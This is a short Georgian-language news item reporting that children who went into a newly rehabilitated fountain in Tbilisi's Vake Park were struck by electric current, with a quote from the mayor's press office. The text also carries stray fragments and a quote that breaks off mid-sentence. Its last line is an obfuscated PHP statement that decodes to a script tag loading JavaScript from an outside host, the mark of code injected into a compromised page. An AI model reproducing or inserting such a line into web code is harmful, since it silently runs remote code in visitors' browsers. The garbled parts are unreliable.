celsiusi
ავერსი შნაიდერი
ახლად რეაბილიტირებულ ვაკის პარკში, შადრევანში ჩასულ ბავშვებს დენმა დაარტყა. თვითმხილველები ყვებიან, რომ ბავშვები ბურთით თამაშობდნენ, რომელიც აუზში ჩავარდა. თავდაპირველად შადრევანში ორი ბავშვი ჩავიდა, ორივე მათგანს თვითმხილველთა თქმით, დენმა დაარტყა, მათ დასახმარებლად ადგილზე მესამე ბავშვიც მივიდა. 
 
მომხდართან დაკავშირებით, საინფორმაციო სააგენტო BUSINESS TIME-ი მერიის პრესამსახურს დაუკავშირდა. 
 
"სამწუხაროდ, მოხდა ასეთი შემთხვევა. საბედნიეროდ ბავშვები გადარჩნენ. დაშავებულებს დახმარება სასწრაფომ გაუწია. დეტალების დაზუსტება მიმდინარეობს.  აღნიშნულზე შინაგან" – განაცხადა მანანა თოქმაჯიშვილმა.  
 
ცნობისთვის, ვაკის პარკში არსებული მცირე კასკადისა და მრგვალი შადრევნის რეაბილიტაცია გუშინ დასრულდა.
 
 
 
457
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");